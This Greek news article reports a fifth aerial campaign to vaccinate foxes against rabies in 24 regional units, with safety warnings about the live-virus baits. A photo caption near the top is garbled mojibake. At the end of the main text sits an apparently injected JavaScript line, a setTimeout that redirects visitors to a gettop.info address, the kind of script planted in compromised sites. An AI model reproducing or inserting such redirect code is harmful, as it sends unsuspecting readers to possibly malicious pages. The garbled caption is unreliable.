Μετά τις 20 Οκτωβρίου ξεκινά ο εμβολιασμός των αλεπούδων κατά της λύσσας

0
10
Áëåðïý ôñÝ÷åé óôç ëßìíç ÊÜñëá . ÃÝìéóå ìå ðïõëéÜ ç ëßìíç ÊÜñëá ðïõ ôçí åðéóêÝðôïíôáé ëüãù ôïõ äñéìý øý÷ïò ðïõ åðéêñáôåß óôá âüñåéá ôçò ÷þñáò. Êýêíïé, ðåëåêÜíïé, êïñìïñÜíïé áêüìç êáé áëåðïýäåò ôñéãõñßæïõí ôç ëßìíç ãéá åîåýñåóç öáãçôïý. ÐÝìðôç 9 Öåâñïõáñßïõ 2012 . ÁÐÅ-ÌÐÅ/ÁÐÅ-ÌÐÅ/ÔÓÁÍÔÏÐÏÕËÏÓ ÓÐÕÑÏÓ

 

Μετά τις 20 Οκτωβρίου πρόκειται να ξεκινήσει η 5η εκστρατεία εμβολιασμού των αλεπούδων κατά της λύσσας με τη ρίψη δολωμάτων-εμβολίων από αέρος με ειδικά αεροσκάφη. Τα εμβόλια – δολώματα που θα χρησιμοποιηθούν περιέχουν ζωντανό, ελαττωμένης λοιμογόνου δύναμης, ιό της λύσσας και απαγορεύεται η οποιαδήποτε επαφή με αυτά. Σε περίπτωση επαφής με το υγρό περιεχόμενο που περιέχεται μέσα στο εμβόλιο, θα πρέπει άμεσα να αναζητείται ιατρική βοήθεια.

Η λύσσα αποτελεί ιογενή λοίμωξη του κεντρικού νευρικού συστήματος, που μεταδίδεται συνήθως μέσω του σάλιου από το δάγκωμα μολυσμένου ζώου.

Πρόκειται για σοβαρότατη ζωοανθρωπονόσο που εκδηλώνεται με τη μορφή εγκεφαλίτιδας στον άνθρωπο. Για την αντιμετώπισή της υπάρχει εκστρατεία σε Ευρωπαϊκό επίπεδο για τον εμβολιασμό των αλεπούδων. Από το 2012 και μέχρι σήμερα έχουν απομονωθεί 48 κρούσματα λύσσας σε ζώα στην Ελλάδα. Το τελευταίο κρούσμα λύσσας καταγράφηκε σε μια αλεπού, τον Μάϊο του 2014, στην Περιφερειακή Ενότητα Πέλλας.

Σύμφωνα με όσα ανακοίνωσε το υπουργείο Αγροτικής Ανάπτυξης, οι ρίψεις θα πραγματοποιηθούν σε 24 Περιφερειακές Ενότητες (Θεσσαλονίκης, Χαλκιδικής, Κιλκίς, Σερρών, Πέλλας, Ημαθίας, Πιερίας, Κοζάνης, Γρεβενών, Καστοριάς, Φλώρινας, Ιωαννίνων, Λάρισας, Τρικάλων, Καρδίτσας, Άρτας, Ροδόπης, Ξάνθης, Έβρου, Καβάλας, Δράμας και τμήματα των ΠΕ Ευρυτανίας, Θεσπρωτίας και Αιτωλοακαρνανίας) και η όλη επιχείρηση αναμένεται ότι θα έχει ολοκληρωθεί έως το τέλος Νοεμβρίου.

Σκοπός της επιχείρησης είναι η ανοσοποίηση του πληθυσμού των κόκκινων αλεπούδων -δεξαμενή του ιού της λύσσας στη φύση στην Ευρώπη- ώστε να αναχαιτισθεί η εξάπλωση της ασθένειας στην Ελλάδα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here